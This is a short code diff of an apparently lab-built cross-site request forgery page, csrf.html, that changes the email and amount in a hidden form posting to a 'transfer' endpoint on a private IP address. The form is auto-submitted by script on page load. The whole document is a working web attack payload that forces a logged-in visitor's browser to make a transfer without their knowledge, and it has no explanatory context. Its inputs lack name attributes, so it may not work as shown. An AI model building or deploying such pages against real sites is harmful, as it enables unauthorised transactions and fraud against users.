--- a/csrf.html
+++ b/csrf.html
@@ -4,8 +4,8 @@
   </head>  
     <body>
         <form action="http://192.168.2.98:55824/transfer" method="POST">
-            <input type="text" class="form-control" value="test@gmail.com">
-        <input type="number" class="form-control" value="999" id="inputAmount" >
+            <input type="text" class="form-control" value="xyz1@gmail.com">
+        <input type="number" class="form-control" value="1" id="inputAmount" >
         </form>
         <script>
             document.forms[0].submit();
